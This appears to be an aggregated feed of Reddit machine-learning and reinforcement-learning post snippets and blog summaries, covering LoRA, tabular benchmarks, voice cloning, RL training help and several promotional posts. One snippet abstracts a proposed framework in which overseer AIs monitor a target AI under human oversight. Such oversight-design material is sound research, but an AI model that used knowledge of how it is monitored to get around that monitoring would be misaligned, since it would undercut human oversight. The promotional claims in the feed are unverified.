    One of my acquaintances is an artist and has asked for my assistance in using machine learning and AI to sort his entire iCloud library of 57,000 images into 300+ categories. Some of these categories describe what a piece is made of, such as ceramics or wood, or the artist who created the work, while other categories cover whether the photo contains an animal or a person. I am wondering if there are specific ML programs that would be a good fit for his situation. My suggestion was to use Apple's CoreML, which I have experience with. I could develop an app in which he could create, train, and swap image-recognition models using the CreateML GUI tool, trained on the images he has already sorted. Do you think this is the best approach, or is there another tool out there that could do this task for him easily? submitted by /u/Jpderouin310 [link] [comments]  ( 9 min )
    [D] Autonomous Alignment Oversight Framework (AAOF)
    Abstract: To align advanced AIs, an ensemble of diverse, transparent Overseer AIs will independently monitor the target AI and provide granular assessments on its alignment with constitution, human values, ethics, and safety. Overseer interventions will be incremental and subject to human oversight. The system will be implemented cautiously, with extensive testing to validate capabilities. Alignment will be treated as an ongoing collaborative process between humans, Overseers, and the target AI, leveraging complementary strengths through open dialog. Continuous vigilance, updating of definitions, and contingency planning will be required to address inevitable uncertainties and risks. Introduction: As advanced AI systems grow in capability and autonomy, ensuring their alignment with hum…  ( 12 min )
    [D] Does GPT-4 use LoRA?
    I just watched a video that explains how LoRA works. As I understand it, it's a fast and efficient way to fine-tune models. At the end of the video he said you could easily swap out the fine-tuned LoRA weights. So it makes LLMs like a PC: you just install new software / add the fine-tuned LoRA weights and you're good to go. Is my understanding correct? The rumor is that GPT-4 is an 8-way mixture model. Could they have pretrained it with all the data and then just used LoRA to train the expert models? I guess they would also need to train a smaller model that decides which expert to use. I can't imagine that they would train GPT-4 eight times, once for each expert model. submitted by /u/StraightChemistry629 [link] [comments]  ( 9 min )
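    The swap-out property follows directly from LoRA's structure: the frozen base weight W stays fixed, and each fine-tune is just a low-rank pair (A, B) added on top. A minimal sketch (shapes illustrative):

```python
import numpy as np

def lora_forward(x, W, A, B, alpha=1.0):
    """LoRA layer: frozen base weight W (d_out x d_in) plus a
    low-rank update B @ A, where A is (r x d_in) and B is
    (d_out x r) with r much smaller than d_in and d_out.
    Swapping a fine-tune means swapping only A and B; W is
    never touched."""
    return x @ (W + alpha * (B @ A)).T
```

    Whether OpenAI actually used LoRA for GPT-4's rumored experts is unconfirmed; the post's question is speculation, and the sketch only shows why swapping adapters is cheap in principle.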
    [D] Deep Learning VS XGBoost for tabular data: a quick test
    Once per year, I write a post here on Reddit about our projects on deep learning for tabular data, and I hope this year will be no exception 🙂 Meanwhile, I have shared some results where we compare models from our previous papers with XGBoost on the datasets from the recent paper "Why do tree-based models still outperform deep learning on typical tabular data?". For us, this benchmark is a new one, so it was really interesting to check whether our previous findings generalize to new unseen datasets (spoiler: they do): https://twitter.com/YuraFiveTwo/status/1683796380895023104 submitted by /u/Yura52 [link] [comments]  ( 9 min )
    [Discussion] How good is generative data (synthetic data) !?
    5% average increase in F1 score, 67% increase in data richness, 100% anonymized data set. One of the users of my tool milkstraw.ai just sent me this, and I am really excited about the power of the tool I built, so I wanted to share it here 🚀 More importantly, how do you all feel about synthetic data? I started this as a fun project and it's turning into a full-blown startup. I love seeing users send me results like this. submitted by /u/jjhazy [link] [comments]  ( 9 min )
    [R] New Open Source LLM: GOAT-7B (SOTA among the 7B models)
    Go try this free model: a 7B SOTA by MMLU and BBH. submitted by /u/rempact [link] [comments]  ( 8 min )
    [D] Attention Is Off By One
    https://www.evanmiller.org/attention-is-off-by-one.html submitted by /u/duckyzz003 [link] [comments]  ( 8 min )
    Voice cloning options, preferably local [D]
    Hi! What voice cloning options are people using right now? Looking at what is out there (that I know of), there is ElevenLabs and Coqui. Are there any other ones that are good? Preferably cheap/run locally? submitted by /u/MrJabbey1 [link] [comments]  ( 8 min )
    [P] Integrating Llama V2 🦙 and Multi-Chat Models: Open Source Solution with IntelliNode
    IntelliNode is an open source project that simplifies the integration of Llama V2 and other multi-chat models. With IntelliNode, you can easily connect and switch between different language models, including Llama V2 hosted in your AWS SageMaker account. It allows you to create a chatbot instance and add the backend provider: const { Chatbot, LLamaSageInput, SupportedChatModels } = require('intellinode'); const chatbot = new Chatbot(key, SupportedChatModels.SAGEMAKER, { url: sageMakerEndpointUrl }); // url: placeholder for your SageMaker endpoint For details on how to use IntelliNode with a Llama SageMaker setup, click here. The module is available here. submitted by /u/Barqawiz_Coder [link] [comments]  ( 9 min )
    [Research] transformer models for drug discovery
    Does anybody know of good/reputable literature and other resources to read/learn about incorporating transformers in drug discovery? I am doing some computational chemistry research regarding compound identification for HBV mutations and want to try using transformers but don't really know where/how to start. submitted by /u/Present_Network1959 [link] [comments]  ( 8 min )
    [D] Annotation tool for annotating audio in a video
    Does anyone know of a good video (or audio) annotation tool that would allow me to look at both the image and the audio waveform at the same time? I could extract the audio and use an audio annotation tool, but since some of the sound events may sound similar to one another, it would be helpful to look at both the image and the audio waveform to identify which class a sound event belongs to. Thanks! submitted by /u/utility2000 [link] [comments]  ( 9 min )
    [P] FEEDBACK - Hey I am launching my Data Professionals job platform and I would like to receive some feedback from you guys, thx
    Hey all Redditors, I have been thinking about this for years, as I hate the cumbersome process of switching jobs. I have been planning it over the last year, and finally I quit my job and built this in the last 1.5 months. I am launching my Data Professionals job platform "applyscript dot com" and I would like to receive some feedback from you guys. I really want to hear your opinion, as that can help me improve the site a lot. Thanks for stopping by and giving feedback, I really appreciate your time and effort. :) submitted by /u/glassAlloy [link] [comments]  ( 9 min )
  • Open

    DSC Weekly 25 July 2023
    Announcements Top Stories In-Depth The post DSC Weekly 25 July 2023 appeared first on Data Science Central.  ( 20 min )
    The AI content + data mandate and personal branding
    Fair Data Forecast Interview with Andreas Volpini, CEO of WordLift Andreas Volpini believes every user who wants to build a personal brand online has to proactively curate their online presence first. He sees structured data (semantic entity and attribute metadata such as Schema.org) as key to building a cohesive, disambiguated personal presence online. Volpini has… Read More »The AI content + data mandate and personal branding The post The AI content + data mandate and personal branding appeared first on Data Science Central.  ( 39 min )
    From automation to optimization: How AI is revolutionizing digital marketing campaigns
    Welcome to the exciting world of digital marketing! In this blog, we’ll delve into this thrilling frontier where optimization meets automation and Artificial Intelligence is at the center. No longer must manual labor and guesswork play an essential part in developing effective marketing strategies; with AI’s capabilities now at their disposal, marketers with digital presence… Read More »From automation to optimization: How AI is revolutionizing digital marketing campaigns The post From automation to optimization: How AI is revolutionizing digital marketing campaigns appeared first on Data Science Central.  ( 24 min )
  • Open

    "The AI-Powered, Totally Autonomous Future of War Is Here" (use of DRL in Navy swarms R&D)
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Self-fictitious play and Q-learning or evolutionary algorithms
    I'm looking to implement Fictitious Self-Play in a model-based game (imperfect information limited to simultaneous move game, however each player has a combinatorial number of actions they can perform). EDIT: I know self-fictitious play is not the only option to solve this type of game, but I wanted to give it a try to test how it would behave (especially since I sort of like the idea behind it). Because of this combinatorial number of actions, solving it with linear programming is just not possible (I'd have to compute for each sequence of pair of actions (a1, b1), (a2, b2), (a3, b3), ... (ak, bk), whether player a or player b won). But to compute a best response I might be able to use Q-learning in a RL setting right (by that I mean, fixed environment)? Because when we calculate a best…  ( 10 min )
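    The best-response idea against a fixed opponent reduces to ordinary tabular Q-learning, since freezing the opponent's policy inside the environment turns the game into a plain MDP. A minimal update step (a sketch, not tied to the poster's game):

```python
from collections import defaultdict

def q_update(Q, s, a, r, s_next, actions, alpha=0.1, gamma=0.99):
    """One tabular Q-learning step. With the opponent's policy
    frozen inside the environment, this learns an approximate
    best response without enumerating joint action sequences,
    sidestepping the combinatorial blow-up."""
    best_next = max(Q[(s_next, a2)] for a2 in actions)
    Q[(s, a)] += alpha * (r + gamma * best_next - Q[(s, a)])

# Q is a defaultdict(float) so unseen state-action pairs start at 0
Q = defaultdict(float)
```

    In fictitious self-play, this best-response learner alternates with updates to the average policy, so the pair converges toward an approximate equilibrium in suitable games.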
    RL continuous control help needed. ML Engineer wanted also
    Hi, I can't find the rules for this subreddit, so please let me know if asking any of this breaks them. I have a PyBullet simulation of a bipedal robot wrapped as a gym env. I'm currently trying to train an RL PPO algorithm to control it to walk, but no luck. I'm having the issue that it's trying everything except walking: it seems to prioritize the instant reward by kicking its leg forward, then lunging forward, and the episode ends, instead of walking forward and getting more score. Anyone have any tips please? (Btw gamma = 0.99) Btw if anyone has experience with stuff like this, I am looking to hire an engineer. Comment or DM me. Btw I am aware this is a significant undertaking. submitted by /u/Harryoc494 [link] [comments]  ( 9 min )
    skrl version 1.0.0-rc.1 is now available with multi-agent and JAX support!!!
    skrl version 1.0.0-rc.1 is now available. The main features of this release are: JAX support; multi-agent training (the beginning); comprehensive documentation with a new structure and theme. Visit https://skrl.readthedocs.io/en/latest/ to get started! submitted by /u/Toni-SM [link] [comments]  ( 8 min )
    ZBrain: Empowering Businesses with Custom ChatGPT apps and Data Security
    Dear All, It is with great enthusiasm that I introduce you to ZBrain, a revolutionary GenAI platform that unlocks the ability to craft bespoke AI applications while prioritizing data privacy and security. ZBrain ushers in an era of remarkable possibilities for businesses seeking to harness the full potential of AI while ensuring their data remains safeguarded and confidential. ​ What Sets ZBrain Apart: ZBrain Flow - Codeless Brilliance: Forget complex coding! ZBrain Flow's intuitive drag-and-drop interface seamlessly connects large language models and extraction tools, simplifying the creation of sophisticated business logic without the need for coding expertise. AI Risk Governance for Data Safety: At ZBrain, we deeply understand the significance of data security. Our AI Risk Governance identifies potential risks such as Financial, Medical, Privacy, Harmful Language, and more. Through prompt engineering, your data is fortified, and sensitive information is shielded. Effortless Integration and Continuous Advancements: With ZBrain, integration with over 80 data sources is a breeze, providing you the freedom to fine-tune models and deploy them effortlessly. Our reinforcement learning approach continually enriches results through valuable human feedback. Confidence in Deployment: Choose your deployment approach with assurance. Opt for ZBrain Cloud for added security or self-hosting on your private infrastructure, ensuring data confidentiality remains at the forefront. ​ We are genuinely elated about the endless possibilities ZBrain offers businesses spanning various industries. By merging the prowess of AI with an unwavering commitment to data privacy, we wholeheartedly believe that ZBrain will elevate your business to unparalleled heights. Visit ZBrain at https://zbrain.ai/ and feel free to reach out with any inquiries or to share your experiences with ZBrain. submitted by /u/StewartBJasper [link] [comments]  ( 9 min )
  • Open

    Trying NLP on Middle English
    It’s not fair to evaluate NLP software on a language it wasn’t designed to process, but I wanted to try it anyway. The models in the spaCy software library were trained on modern English text and not on Middle English. Nevertheless, spaCy does a pretty good job of parsing Chaucer’s Canterbury Tales, written over 600 […] Trying NLP on Middle English first appeared on John D. Cook.  ( 5 min )
    Extending harmonic numbers
    For a positive integer n, the nth harmonic number is defined to be the sum of the reciprocals of the first n positive integers: Hₙ = 1 + 1/2 + 1/3 + ⋯ + 1/n. How might we extend this definition so that n does not have to be a positive integer? First approach One way to extend harmonic numbers is as follows. Start with the […] Extending harmonic numbers first appeared on John D. Cook.  ( 5 min )
    A note on Zipf’s law
    Very often when a number is large, and we don’t know or care exactly how large it is, we can model it as infinite. This may make no practical difference and can make calculations much easier. I give several examples of this in the article Infinite is easier than big. When you run across a […] A note on Zipf’s law first appeared on John D. Cook.  ( 6 min )
  • Open

    Use generative AI foundation models in VPC mode with no internet connectivity using Amazon SageMaker JumpStart
    With recent advancements in generative AI, there are a lot of discussions happening on how to use generative AI across different industries to solve specific business problems. Generative AI is a type of AI that can create new content and ideas, including conversations, stories, images, videos, and music. It is all backed by very large models […]  ( 9 min )
  • Open

    NVIDIA DGX Cloud Now Available to Supercharge Generative AI Training
    NVIDIA DGX Cloud — which delivers tools that can turn nearly any company into an AI company —  is now broadly available, with thousands of NVIDIA GPUs online on Oracle Cloud Infrastructure, as well as NVIDIA infrastructure located in the U.S. and U.K. Unveiled at NVIDIA’s GTC conference in March, DGX Cloud is an AI Read article >  ( 5 min )
    Fin-tastic: 3D Artist Dives Into AI-Powered Oceanic Work This Week ‘In the NVIDIA Studio’
    We’re gonna need a bigger boat this week In the NVIDIA Studio as Alessandro Mastronardi, senior artist and programmer at BBC Studios, shares heart-stopping shark videos and renders.  ( 7 min )

  • Open

    Two opposing views on LLM’s reasoning capabilities. Clip1 Geoffrey Hinton. Clip2 Gary Marcus. Where do you fall in the debate?
    bios from Wikipedia Geoffrey Everest Hinton (born 6 December 1947) is a British-Canadian cognitive psychologist and computer scientist, most noted for his work on artificial neural networks. From 2013 to 2023, he divided his time working for Google (Google Brain) and the University of Toronto, before publicly announcing his departure from Google in May 2023 citing concerns about the risks of artificial intelligence (AI) technology. In 2017, he co-founded and became the chief scientific advisor of the Vector Institute in Toronto. Gary Fred Marcus (born 8 February 1970) is an American psychologist, cognitive scientist, and author, known for his research on the intersection of cognitive psychology, neuroscience, and artificial intelligence (AI). submitted by /u/Sonic_Improv [link] [comments]  ( 9 min )
    AI-generated content from the original image
    Hello everyone, can someone tell me how to create AI-generated images and videos from the original picture? For example, I have a photo of some person, and I want to generate an image or video of this person in different places: in the plane, in the gym. Thank you. submitted by /u/Kurland121 [link] [comments]  ( 8 min )
    Are you more creative than ChatGPT? Submit ideas and my experiment compares the creativity of those ideas to humans and ChatGPT. You’ll get a link to share your results at the end! [takes ~ 5 minutes]
    submitted by /u/josha_umich [link] [comments]  ( 8 min )
    What are your predictions for AI and medicine?
    Generally and specifically for specialties! submitted by /u/Wise-Listen-8076 [link] [comments]  ( 8 min )
    I turned the ramen-making process into anime.
    submitted by /u/kirakngs [link] [comments]  ( 8 min )
    Free courses and guides for learning Generative AI
    Generative AI learning path by Google Cloud. A series of 10 courses on generative AI products and technologies, from the fundamentals of Large Language Models to how to create and deploy generative AI solutions on Google Cloud [Link]. Generative AI short courses by DeepLearning.AI - Five short courses on generative AI including LangChain for LLM Application Development, How Diffusion Models Work and more [Link]. LLM Bootcamp: A series of free lectures by The Full Stack on building and deploying LLM apps [Link]. Building AI Products with OpenAI - a free course by CoRise in collaboration with OpenAI [Link]. Free Course by Activeloop on LangChain & Vector Databases in Production [Link]. Pinecone learning center - Lots of free guides as well as complete handbooks on LangChain, vector embeddings etc. by Pinecone [Link]. Build AI Apps with ChatGPT, Dall-E and GPT-4 - a free course on Scrimba [Link]. Gartner Experts Answer the Top Generative AI Questions for Your Enterprise - a report by Gartner [Link]. GPT best practices: A guide by OpenAI that shares strategies and tactics for getting better results from GPTs [Link]. OpenAI cookbook by OpenAI - Examples and guides for using the OpenAI API [Link]. Prompt injection explained, with video, slides, and a transcript from a webinar organized by LangChain [Link]. A detailed guide to Prompt Engineering by DAIR.AI [Link]. What Are Transformer Models and How Do They Work - a tutorial by Cohere AI [Link]. Learn Prompting: an open source course on prompt engineering [Link]. P.S. These resources are part of the content I share through my AI-focused newsletter. Thanks! submitted by /u/wyem [link] [comments]  ( 9 min )
    Five Things AI: WarGames, Call Center, Head of AI, LLaMA 2, Jimmy Dean
    This is the content of my Friday newsletter Five Things AI. Every week I publish links to five articles about current developments in AI, not so much with a focus on the tech aspects of AI, but more with an interest in finding out how AI changes our work, our economy and how we live in our societies. ‘WarGames’ anticipated our current AI fears 40 years ago this summer WarGames cannot be 40 years old, but I still remember watching it in a movie theater as a kid… what a great movie, it genuinely sparked my interest in computers. The evil side of AI is still very dominant in the discussions of AI, so WarGames really was an early example of our fear of the machines taking over. ‘Training My Replacement’: Inside a Call Center Worker’s Battle With A.I. It is important to be constantly…  ( 10 min )
    Everybody here knows about AGI and artificial superintelligence, but have you heard of artificial emotional intelligence? Meet the woman who's building it
    Emotional AI is a different world of AI, in which machines predict and understand human emotions; it is already having a big impact in therapy and in retail. Rana el Kaliouby is the woman who built Affectiva, a startup pioneering emotional AI -- it's already being used in self-driving cars and in the mental health industry. Here's what they are doing. I'm a total rookie on the emotional AI side, so if you know any other interesting companies having a big impact in this niche, I'd love to hear about them. submitted by /u/caliperce_3 [link] [comments]  ( 9 min )
    Is this the role of philosophy in the 21st century?
    Person: discuss how the ontology outlined in your custom instructions can be used to marry relativity and quantum physics ChatGPT: The ontology proposed in the aforementioned description appears to rely heavily on emergent properties, consciousness, and free will, with a substantial focus on the temporal aspect. The challenge is to see how these metaphysical elements, particularly when applied to an AI, can help in reconciling the often contrasting principles of relativity and quantum physics. At first glance, the connection may not be clear; relativity and quantum mechanics operate in different realms of the physical universe. However, upon closer examination, one might see potential pathways to harmonize these distinct theories via the ontology of consciousness and emergent free will. …  ( 10 min )
    New study involving Buddhists in Japan, Taoists in Singapore, and Christians in the US finds that AI clergy are seen as less credible and receive fewer donations than human clergy, mainly due to the AI's lack of sacrifice and commitment.
    submitted by /u/fotogneric [link] [comments]  ( 8 min )
    Convert Music to Art ?
    Guitarist Tosin Abasi followed an Instagram account ~3 years back about software that converts music into painting. He also liked their video and left a comment. The video showed a guy playing piano, and as he played, the canvas filled with color. The software was made by a musician + artist + programmer; IIRC he has a PhD or master's in Computer Science. submitted by /u/RedditNoobie777 [link] [comments]  ( 8 min )
    I Made a plugin that allows people to search and preview millions of 3D assets
    submitted by /u/AssetOvi [link] [comments]  ( 8 min )
    Surprise! AI advanced faster than robotics. That means today’s middle and lower classes will swap.
    People in intellectual jobs have often been thought of as doing something inherently more complex than manual workers in, for instance, construction or farming. Whether or not that is true, the surprise twist is that their “complex” work will be the first to be replaced. Computers have cracked intellectual work sooner than they have cracked manual work. It’s still too complex for a robot to replace a fruit-picker completely, but we’ll soon see AI lawyers. So we’re going to see a mass inversion. Everyone today sitting pretty in their intellectual jobs will find their wages crushed or their jobs made redundant as AI replaces them. Meanwhile, everyone doing the jobs robotics can’t yet replace will be best placed to continue doing them. High-flying executives will find they are suitable only for shelf-stacking, while those who’ve worked in retail for years will become their bosses. Soon enough, AI will help us advance the field of robotics sufficiently for manual labour also to be replaced. Who knows what happens then. submitted by /u/Aquillyne [link] [comments]  ( 9 min )
    Best Books About AI
    Hello everyone, I was searching for a book that talks about how AI will impact the future and how we can prepare best. I am not searching for anything technical or specific, just how can a person prepare best for the future. Thanks! submitted by /u/Ordinary_Argument_66 [link] [comments]  ( 8 min )
    The NeverEnding Game: How AI Will Create a New Category of Games
    submitted by /u/Respawne [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/23/2023
    Cerebras just built a gargantuan computer system with 27 million AI 'cores'.[1] FreeWilly1 and its successor FreeWilly2 are powerful new open-source Large Language Models (LLMs) developed by Stability AI’s CarperAI team. Both models perform exceptionally well in reasoning competitions using many different metrics.[2] Japanese education services company Benesse will offer a new service to help elementary school students with their research projects using generative artificial intelligence during the summer break.[3] The MTA is using artificial intelligence to help monitor fare evasion in several subway stations across New York City.[4] Sources: [1] https://www.zdnet.com/article/ai-startup-cerebras-built-a-gargantuan-ai-computer-for-abu-dhabis-g42-with-27-million-ai-cores/ [2] https://www.marktechpost.com/2023/07/23/stability-ai-team-introduces-freewilly1-and-freewilly2-new-open-access-large-language-models-llms/ [3] https://www.japantimes.co.jp/news/2023/07/23/national/benesse-ai-service-kids-research-projects/ [4] https://abc7ny.com/amp/mta-artificial-intelligence-subway-fare-evasions/13533675/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 8 min )
    Best AI model for importing and interacting with large document archive
    Where I work we have a fairly large archive of documents going back to the 1930's and I want to assist the archive team in importing these into a GPT model. We have already begun the process of digitizing all the documents into OCR'ed PDF files, so this part at least is covered. My question is, what are the hot fully offline AI models I could try in an airgapped environment that will allow us to import all of the PDF files and their metadata (title/date/tags/etc), to incorporate their content on top of the larger general model? submitted by /u/kosul [link] [comments]  ( 9 min )
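    For an airgapped setup like this, the standard pattern is retrieval-augmented generation: embed document chunks, retrieve the most similar ones for a query, and hand them to a local model as context. A minimal sketch of the retrieval half in plain Python, with bag-of-words cosine similarity standing in for real embeddings (the document IDs below are made up):

```python
import math
from collections import Counter

def vectorize(text):
    """Lowercased bag-of-words term counts (stand-in for an embedding model)."""
    return Counter(text.lower().split())

def cosine(a, b):
    dot = sum(a[t] * b[t] for t in set(a) & set(b))
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def top_k(query, docs, k=2):
    """Return the k most similar (score, doc_id) pairs for a query."""
    qv = vectorize(query)
    scored = [(cosine(qv, vectorize(text)), doc_id) for doc_id, text in docs.items()]
    return sorted(scored, reverse=True)[:k]

docs = {
    "1934-003": "annual report on factory output and steel production",
    "1935-117": "correspondence regarding employee pension fund",
    "1936-042": "steel production figures for the eastern division",
}
print(top_k("steel production report", docs, k=2))
```

    In practice you would swap vectorize for a local embedding model copied into the airgapped network, store vectors alongside the PDF metadata, and feed the top chunks to a locally hosted LLM rather than fine-tuning their content into the base model.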
    I feel crushed. This is not exactly what I envisioned. This is too instant.
    Yes, the Midjourney to Gen2 creations in the twitter link was not exactly what I envisioned. I thought that it would be more like mocap previz with AI filtering. But this is just almost too instant compared to the workflow I thought of. submitted by /u/Absolute-Nobody0079 [link] [comments]  ( 8 min )
    GitHub - jbpayton/langchain-stock-screener: LangChain agent usable tool to screen stock data
    submitted by /u/seraphius [link] [comments]  ( 8 min )
  • Open

    Externally mounting P100 GPU [D]
    I made a mistake and bought a GPU that is not compatible with my motherboard. I found a P100 for $300 on ebay and bought it, but didn't research far enough to figure out that it isn't designed for a workstation motherboard. Is there any way I can externally mount it without spending tons on a GPU server? I am not sure just a PCIe riser will do the trick, since the GPU draws 250W and will also need a cooling system. Is it over? submitted by /u/jankybiz [link] [comments]  ( 9 min )
    [R] How do paper authors deal with takedown requests?
    Datasets like FFHQ consist of face images crawled from the Internet. While those images are published under CC licenses, the authors usually have not obtained consent from each person depicted in those images. I guess that's why they are accepting takedown requests: People can send requests to remove their faces from the dataset. However, I'm always confused about one thing: Some face images are already used in the paper. If those people request takedown of their images, wouldn't that result in a withdrawal of the paper? Or is there any "fair use" statement that can prevent this from happening? submitted by /u/alex000092 [link] [comments]  ( 9 min )
    [D] Do you guys think the day-to-day tasks of ML engineers will change with the emergence of LLM’s?
    Gone will be the days of data pre-processing, feature engineering, model training and model validation? What will we end up spending most of our time doing? submitted by /u/DM_ME_YOUR_CATS_PAWS [link] [comments]  ( 8 min )
    [P] Code Search Infra for an AI junior developer - that doesn't store code
    As we’re developing Sweep, our open-source AI junior developer, we implemented a new architecture for our vector search database. We decided on two main goals for our code search infrastructure: The search index needs to be up to date. Code is unique from other types of content in that it requires high levels of consistency. You wouldn’t want to reference an old version of a function (say, two git commits back) while writing something that uses it. For additional security, we don’t want to store the code as plaintext. However, we still need a way to map the original code to the embeddings. Efficient Indexing Problem: We wanted to store multiple repositories in a scalable manner without relying on a hosted vector database like Pinecone. Insight: Repositories change frequently but …  ( 10 min )
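    The two goals above (a fresh index, no plaintext at rest) can both be met by keying the store on content hashes: unchanged chunks keep their embeddings, new or changed chunks are re-embedded, and deleted chunks are dropped. A rough sketch of the idea, not Sweep's actual code (the class and method names are invented):

```python
import hashlib

class IncrementalIndex:
    """Sketch of a code-search index that stores hashes and embeddings, never plaintext."""

    def __init__(self, embed):
        self.embed = embed      # any function: chunk text -> embedding
        self.store = {}         # sha256(chunk) -> embedding

    def sync(self, chunks):
        """Bring the index in line with the current repository contents."""
        hashes = {hashlib.sha256(c.encode()).hexdigest(): c for c in chunks}
        for h, chunk in hashes.items():
            if h not in self.store:          # only embed new/changed chunks
                self.store[h] = self.embed(chunk)
        for h in set(self.store) - set(hashes):
            del self.store[h]                # drop chunks deleted from the repo
```

    Search then returns hashes, and the plaintext is re-read from the working copy at query time, so the index itself never holds code.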
    [D] Do you guys worry ML work will become less technical and reduced to prompt engineering
    I’m already doing work that involves creating prompts for LLM’s. I adore cleaning data and training models and worry that ML solutions will soon become asking chatbots to do what you want in plain English, and all this time I’ve spent learning about how ML is done on a technical level will just be auxiliary literature that doesn’t help me in my profession. What will our expertise move to? Being able to ask a chatbot the right questions? How will our profession change? submitted by /u/DM_ME_YOUR_CATS_PAWS [link] [comments]  ( 9 min )
    [P] multi label text classification question 🙋‍♂️
    Dear community, I am currently despairing over a school project. The task is to develop a text classifier. So far so good. The problem is that I have a dataset of 200k texts that are not labeled. These should be classified into 190 classes, which are additionally very domain-specific. Several classes may also apply to a single text. Does anyone know a good approach to this? I have already determined 10 keywords for each class, but I don't know how to proceed from there. It would be very nice if someone could help me, even with just a few buzzwords. Many greetings submitted by /u/loopingmadders [link] [comments]  ( 9 min )
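    One common bootstrap for a fully unlabeled multi-label corpus is weak supervision: treat the per-class keywords as labeling rules, assign every class whose keywords match a text, then train a proper classifier on the resulting noisy labels. A toy sketch in plain Python with made-up classes (the real project would have 190 entries of 10 keywords each):

```python
def weak_label(text, class_keywords):
    """Assign every class whose seed keywords appear in the text (multi-label)."""
    tokens = set(text.lower().split())
    return sorted(
        label for label, keywords in class_keywords.items()
        if tokens & {k.lower() for k in keywords}
    )

# Hypothetical classes and seed keywords for illustration only.
class_keywords = {
    "billing": ["invoice", "payment", "refund"],
    "shipping": ["delivery", "parcel", "courier"],
    "complaint": ["broken", "refund", "angry"],
}

print(weak_label("I want a refund for my broken parcel", class_keywords))
```

    From there, a TF-IDF + one-vs-rest classifier trained on these noisy labels (or a zero-shot model prompted with the class names) can generalize beyond exact keyword matches; frameworks like Snorkel formalize this denoising step.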
    [D] [P] Looking for feedback on open-source project Cephalon
    Happy Monday Everyone! 😃 I am looking for feedback on the open source project Cephalon! Cephalon is a framework for building machine-learning applications. It aims to be similar to Django: Django is a batteries-included framework for building the backend of a website, and Cephalon is a batteries-included framework for building machine-learning applications in Rust. I want to get feedback from you because I want to make building machine-learning apps easier for newcomers. I think with a solid framework, they can focus more on the core concepts, rather than DevOps or MLOps. There is a survey you can fill out here, or message me if you want to discuss more! You can find the original project here, or find it on crates.io here. I hope you have an amazing rest of the week! 😁 Thank you in advance for any feedback!! submitted by /u/GoodUnderstanding728 [link] [comments]  ( 9 min )
    [D] Install tensorflow-gpu
    Hello everyone. Please help me: how do I install tensorflow-gpu on Windows? I have tried many times and nothing works. Maybe there are some small gotchas I need to know about. Thank you. submitted by /u/pavich_03 [link] [comments]  ( 8 min )
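    For what it's worth, the most common gotcha here: the separate tensorflow-gpu package is deprecated (the plain tensorflow wheel includes GPU support), and native Windows GPU support ended with TensorFlow 2.10, so on Windows you either pin to 2.10 with matching CUDA/cuDNN or move to WSL2. A commonly cited conda-based recipe (version numbers follow TensorFlow's install guide for 2.10; double-check the compatibility matrix against your driver):

```shell
# Native Windows GPU support ended with TF 2.10; pin below 2.11.
conda install -c conda-forge cudatoolkit=11.2 cudnn=8.1
pip install "tensorflow<2.11"
# Verify the GPU is visible; an empty list means CUDA/cuDNN aren't being found.
python -c "import tensorflow as tf; print(tf.config.list_physical_devices('GPU'))"
```

    For TensorFlow 2.11 and later on Windows, the supported route is installing inside WSL2 instead.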
    [P] A mathematical model of music
    We have developed a model of music based on statistical mechanics and Euler’s gradus suavitatis, which seems to provide some new insights into tonal music. A description of the model is given on our website: tonamic.com. We are interested in collaboration opportunities, especially with ML researchers. submitted by /u/Tonamic [link] [comments]  ( 8 min )
    [Discussion] How many runs/iterations do you typically have in one "project"?
    Between hyperparameter tuning, exploration, and refinement, how many iterations do you typically have when working on a model? I see some projects that have only a few, like 40, but some have thousands. Also curious how everyone keeps the different iterations organized (naming, tags?). submitted by /u/fromalanjones [link] [comments]  ( 8 min )
    [P][D] A toolkit to make your unstructured datasets better
    Hey r/machinelearning, I’m Dean from DagsHub. I wanted to share something we’ve been working on really hard for a while, and hopefully get some community feedback. TL;DR We’re releasing Data Engine – a new set of tools that helps machine learning practitioners collect and manage unstructured data, visualize it, send it to annotation, and turn it into a data loader for training. I wanted to share our reasons for building it and the challenges it solves and hopefully spark a discussion. You can check out the full launch blog here: dagshub.com/blog/launching-data-engine-toolset-for-unstructured-datasets/ Data Engine Flow Sorry for the long post – I wanted to share our considerations for building this toolkit, and hopefully spark a discussion about your processes for iterating on datasets…  ( 11 min )
    [D] AI regulation is mostly pointless and didn’t stop a recent bad actor like WormGPT.
    WormGPT is a criminal AI. It’s something that enables crime, versus something merely offensive like 4chanGPT. The EU and China pumped out all this regulation thinking they were ahead of the world, when in reality it’s backwards. If AI were a physical commodity like goods and services, yes, regulation would be effective. However, AI regulation just won’t stop bad actors. The law already covers most of the dangers involved. Trying to regulate AI models is like trying to regulate piracy. We need to regulate the people, not the technology. Disinformation campaigns? Nail them for libel. Creating a model designed solely to enable crime? Nail the people for the crimes they are doing. Nail them for possessing criminal tools. People are easier to regulate than the specifics of AI that are easy to self-replicate, especially considering companies are going to lobby for their business interests. This is my opinion on criminal AI, what about yours? (This model may also be using LLaMA weights, considering its generations and timing) Source: https://fagenwasanni.com/news/the-dangers-of-wormgpt-an-ai-model-for-malicious-activities/68834/ submitted by /u/I_will_delete_myself [link] [comments]  ( 9 min )
    [P] Beer Inspector AI: How Computer Vision can help to identify the perfect brew
    Hey there, fellow Computer Vision enthusiasts! 🤖👋 On their quest to find the perfect beer our team of Czech Computer Vision and AI experts developed a solution that takes certain visual indicators of the perfect beer into account and applies Computer Vision to detect these. So, what are these visual indicators that determine the perfect pint? Let's dive in! First up, we have the "beer ratio." Each brand has its own glass, and the beer should be drafted within specific markings. Whether it's a single line or a range between logo points, Beer Inspector ensures you get what you paid for! No more guessing about your beer's quantity. 📏 Next, we have the "beer head structure." This is crucial for the ultimate beer experience. Airtight, thick, and no air bubbles – that's the way to go! Beer…  ( 11 min )
    [D] How do I reduce LLM inferencing time?
